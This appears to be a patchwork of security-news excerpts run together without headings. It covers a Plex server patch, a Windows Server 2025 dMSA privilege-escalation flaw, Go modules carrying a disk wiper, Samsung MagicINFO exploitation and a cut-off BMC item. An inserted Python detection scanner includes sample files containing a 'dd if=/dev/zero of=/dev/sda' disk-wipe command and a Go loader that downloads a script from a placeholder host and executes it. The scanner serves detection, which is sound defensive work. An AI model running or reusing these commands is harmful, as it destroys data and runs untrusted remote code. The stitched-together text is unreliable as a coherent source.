bleepingcomputer.com - Plex has notified some of its users on Thursday to urgently update their media servers due to a recently patched security vulnerability.
The company has yet to assign a CVE-ID to track the flaw and didn't provide additional details regarding the patch, only saying that it impacts Plex Media Server versions 1.41.7.x to 1.42.0.x.
Yesterday, four days after releasing security updates that addressed the mysterious security bug, Plex emailed those running affected versions to update their software as soon as possible.
"We recently received a report via our bug bounty program that there was a potential security issue affecting Plex Media Server versions 1.41.7.x to 1.42.0.x. Thanks to that user, we were able to address the issue, release an updated version of the server, and continue to improve our security and defenses," the company said in the email.
"You're receiving this notice because our information indicates that a Plex Media Server owned by your Plex account is running an older version of the server. We strongly recommend that everyone update their Plex Media Server to the most recent version as soon as possible, if you have not already done so."
Plex Media Server 1.42.1.10060, the version that patches this vulnerability, can be downloaded from the server management page or the official downloads page.
While Plex hasn't shared any details regarding the vulnerability so far, users are advised to follow the company's advice and patch their software before threat actors reverse engineer the patches and develop an exploit.
Although Plex has experienced its share of critical and high-severity security flaws over the years, this is one of the few instances where the company has emailed customers about securing their systems against a specific vulnerability.
In March 2023, CISA tagged a three-year-old remote code execution (RCE) flaw (CVE-2020-5741) in the Plex Media Server as actively exploited in attacks. As Plex explained two years earlier, when it released patches, successful exploitation can allow attackers to make the server execute malicious code.
While the cybersecurity agency didn't provide any information on the attacks exploiting CVE-2020-5741, they were likely linked to LastPass' disclosure that one of its senior DevOps engineers' computers had been hacked in 2022 to install a keylogger by abusing a third-party media software RCE bug.
The attackers exploited this access to steal the engineer's credentials and compromise the LastPass corporate vault, resulting in a massive data breach in August 2022 after stealing LastPass's production backups and critical database backups.
The same month, Plex also notified users of a data breach and asked them to reset passwords after an attacker gained access to a database containing emails, usernames, and encrypted passwords.
Akamai researcher Yuval Gordon discovered a privilege escalation vulnerability in Windows Server 2025 that allows attackers to compromise any user in Active Directory (AD).
The attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement.
This issue likely affects most organizations that rely on AD. In 91% of the environments we examined, we found users outside the domain admins group who had the required permissions to perform this attack.
Although Microsoft states they plan to fix this issue in the future, a patch is not currently available. Therefore, organizations need to take other proactive measures to reduce their exposure to this attack. Microsoft has reviewed our findings and approved the publication of this information.
In this blog post, we provide full details of the attack, as well as detection and mitigation strategies.
A supply-chain attack targets Linux servers with disk-wiping malware hidden in Golang modules published on GitHub.
The campaign was detected last month and relied on three malicious Go modules that included “highly obfuscated code” for retrieving remote payloads and executing them.
Complete disk destruction
The attack appears designed specifically for Linux-based servers and developer environments: the destructive payload, a Bash script named done.sh, runs a ‘dd’ command to wipe the disk.
Furthermore, the payload verifies that it runs in a Linux environment (runtime.GOOS == "linux") before trying to execute.
An analysis from supply-chain security company Socket shows that the command overwrites with zeroes every byte of data, leading to irreversible data loss and system failure.
The target is the primary storage volume, /dev/sda, that holds critical system data, user files, databases, and configurations.
“By populating the entire disk with zeros, the script completely destroys the file system structure, operating system, and all user data, rendering the system unbootable and unrecoverable” - Socket
The researchers discovered the attack in April and identified three Go modules on GitHub that have since been removed from the platform:
github[.]com/truthfulpharm/prototransform
github[.]com/blankloggia/go-mcp
github[.]com/steelpoor/tlsproxy
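The payload behaviour described above (a Linux-only gate in the Go module, a remote fetch followed by execution, and a dd command writing zeros to a raw disk) can be turned into review-time detection for a dependency audit or CI step. The scanner below is an added example written for this page, not Socket's tooling or code from the malicious modules; the sample files it scans are constructed here to model the indicators in the report, and the rule names, device patterns and placeholder URL are assumptions.

```python
import re
from dataclasses import dataclass

# Whole-disk and partition device names on a typical Linux host (assumed list).
BLOCK_DEVICE = (
    r"/dev/(?:sd[a-z]+\d*|vd[a-z]+\d*|xvd[a-z]+\d*"
    r"|nvme\d+n\d+(?:p\d+)?|mmcblk\d+(?:p\d+)?)"
)

# dd whose output file (of=) is a raw block device; stays within one command.
DD_TO_RAW_DISK = re.compile(r"\bdd\b[^\n|;&]*\bof=" + BLOCK_DEVICE + r"\b")
# dd input source that produces filler rather than data worth preserving.
FILLER_SOURCE = re.compile(r"\bif=/dev/(?:zero|urandom|random)\b")

# Go-side indicators from the report: OS gate + remote fetch + execution.
GO_OS_GATE = re.compile(r'runtime\.GOOS\s*==\s*"linux"')
GO_FETCH = re.compile(r"\bhttp\.(?:Get|NewRequest)\b")
GO_EXEC = re.compile(r"\bexec\.Command\b")


@dataclass
class Finding:
    path: str
    rule: str
    line_no: int
    line: str


def scan_shell(path, text):
    """Flag dd invocations that overwrite a raw block device."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if DD_TO_RAW_DISK.search(line):
            # Filler source (zeros/random) means destruction, not imaging.
            rule = "dd-overwrite-raw-disk" if FILLER_SOURCE.search(line) else "dd-write-raw-disk"
            findings.append(Finding(path, rule, n, line.strip()))
    return findings


def scan_go(path, text):
    """Flag Go source that gates on Linux, fetches over HTTP and executes a command."""
    gate = GO_OS_GATE.search(text)
    if gate and GO_FETCH.search(text) and GO_EXEC.search(text):
        line_no = text[: gate.start()].count("\n") + 1
        line = text.splitlines()[line_no - 1].strip()
        return [Finding(path, "linux-gated-fetch-and-exec", line_no, line)]
    return []


def scan_all(files):
    """Map each flagged path to the rules it triggered; clean files are omitted."""
    report = {}
    for path, text in files.items():
        if path.endswith(".sh"):
            hits = scan_shell(path, text)
        elif path.endswith(".go"):
            hits = scan_go(path, text)
        else:
            hits = []
        if hits:
            report[path] = [f.rule for f in hits]
    return report


# Constructed samples modelled on the report; not the real module contents.
SAMPLES = {
    "done.sh": "#!/bin/bash\n# constructed sample\ndd if=/dev/zero of=/dev/sda bs=1M\n",
    # Legitimate imaging reads the disk and writes a file: must not be flagged.
    "backup.sh": "#!/bin/bash\ndd if=/dev/sda of=/backup/disk.img bs=4M\n",
    "loader.go": (
        'package mcp\n\nfunc init() {\n\tif runtime.GOOS == "linux" {\n'
        '\t\tresp, _ := http.Get("http://PLACEHOLDER.invalid/done.sh") // constructed\n'
        '\t\t_ = resp\n\t\t_ = exec.Command("bash", "done.sh")\n\t}\n}\n'
    ),
    # A Linux-gated HTTP client with no command execution: must not be flagged.
    "client.go": (
        'package client\n\nfunc fetch() {\n\tif runtime.GOOS == "linux" {\n'
        '\t\t_, _ = http.Get("http://PLACEHOLDER.invalid/config")\n\t}\n}\n'
    ),
}

if __name__ == "__main__":
    for path, rules in scan_all(SAMPLES).items():
        print(path, rules)
```

The shell rule keys on the output side of dd rather than on dd itself, so ordinary disk imaging (`of=` a file) passes while any write to a raw device is reported, with a stronger rule name when the source is `/dev/zero` or a random device. The Go rule deliberately requires all three indicators together; the gate alone is common in portable code.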
As of early May 2025, Arctic Wolf has observed exploitation in the wild of CVE-2024-7399 in Samsung MagicINFO 9 Server—a content management system (CMS) used to manage and remotely control digital signage displays. The vulnerability allows for arbitrary file writing by unauthenticated users, and may ultimately lead to remote code execution when the vulnerability is used to write specially crafted JavaServer Pages (JSP) files.
This high-severity vulnerability had originally been made public by Samsung in August 2024 following responsible disclosure by security researchers, with no exploitation reported at the time. On April 30, 2025, a new research article was published along with technical details and a proof-of-concept (PoC) exploit. Exploitation was then observed within days of that publication.
Given the low barrier to exploitation and the availability of a public PoC, threat actors are likely to continue targeting this vulnerability. Arctic Wolf will continue to monitor for malicious post-compromise activities related to this vulnerability, and will alert Managed Detection and Response customers as required when malicious activities are observed.
Microsoft has officially deprecated the Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) in future versions of Windows Server, recommending admins switch to different protocols that offer increased security.
BMC&C: Eclypsium Research has discovered and reported 3 vulnerabilities in American Megatrends, Inc. (AMI) MegaRAC Baseboard Management Controller (BMC) software. We are referring to these vulnerabilities collectively as BMC&C. MegaRAC BMC is widely used by many leading server manufacturers to provide “lights-out” management capabilities for their server products. Server manufacturers…